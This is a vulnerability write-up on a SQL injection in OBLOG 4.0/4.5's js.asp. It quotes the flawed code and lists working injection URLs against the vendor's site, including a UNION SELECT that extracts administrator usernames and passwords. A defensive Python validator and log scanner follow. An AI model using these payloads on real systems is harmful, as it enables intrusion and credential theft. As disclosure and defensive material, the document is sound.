OBLOG 4.0 / 4.5 Vulnerability Exploitation Analysis

Published: 2016-12-29 Source: 查字典 editor

Abstract: Source: DeepenStudy. Vulnerable file: js.asp

Source: DeepenStudy

Vulnerable file: js.asp

<%
Dim oblog
Set oblog = New class_sys
oblog.autoupdate = False
oblog.start

Dim js_blogurl, n
js_blogurl = Trim(oblog.CacheConfig(3))
' n (row count) and j (dispatcher switch) are cast with CInt, so they cannot carry SQL text
n = CInt(Request("n"))
If n = 0 Then n = 1

Select Case CInt(Request("j"))
    Case 1
        Call tongji()
    Case 2
        Call topuser()
    Case 3
        Call adduser()
    Case 4
        Call listclass()
    Case 5
        Call showusertype()
    Case 6
        Call listbestblog()
    Case 7
        Call showlogin()
    Case 8
        Call showplace()
    Case 9
        Call showphoto()
    Case 10
        Call showblogstars()
    Case 11
        Call show_hotblog()
    Case 12
        Call show_teams()
    Case 13
        Call show_posts()
    Case 14
        Call show_hottag()
    Case 0
        Call showlog()
End Select

' **************** part of the code omitted ******************

Sub show_posts()
    Dim teamid, postnum, l, u, t
    ' tid is read as a raw string; unlike l, u and t it is never cast with CInt
    teamid = Request("tid")
    postnum = n
    l = CInt(Request("l"))
    u = CInt(Request("u"))
    t = CInt(Request("t"))

    Dim rs, sql, sRet, sAddon
    Sql = "select Top " & postnum & " teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0"
    If teamid <> "" And teamid <> "0" Then
        ' only "|" is rewritten to ","; every other character in tid reaches the SQL unchanged
        teamid = Replace(teamid, "|", ",")
        ' injection point: tid is concatenated straight into the IN (...) list
        Sql = Sql & " And teamid In (" & teamid & ")"
    End If
    Sql = Sql & " order by postid Desc"
    Set rs = oblog.Execute(Sql)

    sRet = ""
    Do While Not rs.Eof
        sAddon = ""
        ' the HTML markup inside these string literals was lost in extraction; only the empty literals remain
        sRet = sRet & "" & oblog.Filt_html(Left(rs(2), l)) & ""
        If u = 1 Then sAddon = rs(4)
        If t = 1 Then
            If sAddon <> "" Then sAddon = sAddon & ","
            sAddon = sAddon & rs(3)
        End If
        If sAddon <> "" Then sAddon = "(" & sAddon & ")"
        sRet = sRet & sAddon & ""
        rs.Movenext
    Loop
    Set rs = Nothing
    sRet = sRet & ""
    ' the query results are sent back to the caller as JavaScript
    Response.Write oblog.htm2js(sRet, True)
End Sub

The show_posts() procedure is only reached when the request carries the dispatcher parameters shown above: n=1 and j=13.

The injection point is the concatenation (" & teamid & "): the tid parameter goes into the SQL string with no validation beyond the Replace() call.

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and1=1and(1=1   returns normally

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and1=1and(1=2   returns an error

Guessing the administrator table name:

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and[query statement]and(1=1

The original query selects six columns (teamid, postid, topic, addtime, author, userid):

Sql = "select Top " & postnum & " teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0"

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and1=2unionselect1,2,3,4,5,6fromoblog_adminwhereid=(1

Output (the HTML inside the string literal was lost in extraction):

document.write('
');

The 1 and 2 in gid=1 and pid=2 are those columns; replace 1,2 with username,password:

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and1=2unionselectusername,password,3,4,5,6fromoblog_adminwhereid=(1
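The root cause above is that tid is spliced into the SQL as free text. The following added example (not from the original article or the OBLOG project) shows the two defender-side pieces a practitioner would want: the input check show_posts() should have applied, accepting only a "|"-separated list of integers, and a small log review that flags js.asp requests whose tid does not have that shape. Function names, the log line format and every sample value are assumptions made for the example.

```python
"""Added example (not from the original article or the OBLOG project).

1. validate_tid()        - the check js.asp should make before building
                           "... And teamid In (...)" from the tid parameter.
2. build_team_filter()   - builds the IN (...) fragment from validated ints only.
3. find_suspicious_tid() - scans constructed log lines for js.asp requests
                           whose tid is not a plain integer list.

Function names, the log format and all sample values are assumptions.
"""
import re
from urllib.parse import parse_qs, urlsplit

# A legitimate tid is one or more non-negative integers joined by "|",
# which is the only shape the show_posts() feature actually needs.
_TID_RE = re.compile(r"^\d+(\|\d+)*$")


def validate_tid(raw):
    """Return a list of ints if raw is a well-formed tid, otherwise None.

    Returning None lets the caller refuse the request instead of building
    SQL from attacker-controlled text.
    """
    if raw is None:
        return None
    raw = raw.strip()
    if not _TID_RE.fullmatch(raw):
        return None
    return [int(part) for part in raw.split("|")]


def build_team_filter(tid_values):
    """Build the IN (...) fragment from already-validated integers only.

    Because every element is an int, the joined text cannot contain SQL.
    Binding them as query parameters would be better still where the
    database layer allows it.
    """
    if not tid_values:
        return ""
    return " And teamid In (" + ",".join(str(v) for v in tid_values) + ")"


# Constructed sample log lines (not real traffic) in a common-log-like shape.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Dec/2016:10:00:01 +0800] "GET /js.asp?n=1&j=13&tid=1 HTTP/1.1" 200 512
10.0.0.5 - - [29/Dec/2016:10:00:02 +0800] "GET /js.asp?n=1&j=13&tid=1|2|3 HTTP/1.1" 200 640
10.0.0.9 - - [29/Dec/2016:10:00:03 +0800] "GET /js.asp?n=1&j=13&tid=1)and1=1and(1=1 HTTP/1.1" 200 512
10.0.0.9 - - [29/Dec/2016:10:00:04 +0800] "GET /js.asp?n=1&j=13&tid=1)and1=1and(1=2 HTTP/1.1" 500 210
10.0.0.7 - - [29/Dec/2016:10:00:05 +0800] "GET /index.asp HTTP/1.1" 200 3000
"""

# client ip, timestamp, request target and status code of a GET line
_REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "GET (\S+) HTTP/[\d.]+" (\d{3})')


def find_suspicious_tid(log_text):
    """Return (client_ip, raw_tid, status) for js.asp hits whose tid fails validation."""
    hits = []
    for line in log_text.splitlines():
        m = _REQ_RE.match(line)
        if not m:
            continue
        ip, _ts, target, status = m.groups()
        parts = urlsplit(target)
        if not parts.path.lower().endswith("/js.asp"):
            continue
        # parse_qs splits each pair on the first "=", so "1)and1=1" stays one value
        qs = parse_qs(parts.query, keep_blank_values=True)
        for raw in qs.get("tid", []):
            if validate_tid(raw) is None:
                hits.append((ip, raw, int(status)))
    return hits


if __name__ == "__main__":
    for ip, raw, status in find_suspicious_tid(SAMPLE_LOG):
        print(f"{ip} tid={raw!r} status={status}")
```

Run on the constructed log, the two requests with parentheses in tid are reported while the plain "1" and "1|2|3" pass; in production the same validate_tid() shape applied at the entry point removes the injection, and the log check is useful for finding attempts in historical traffic.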
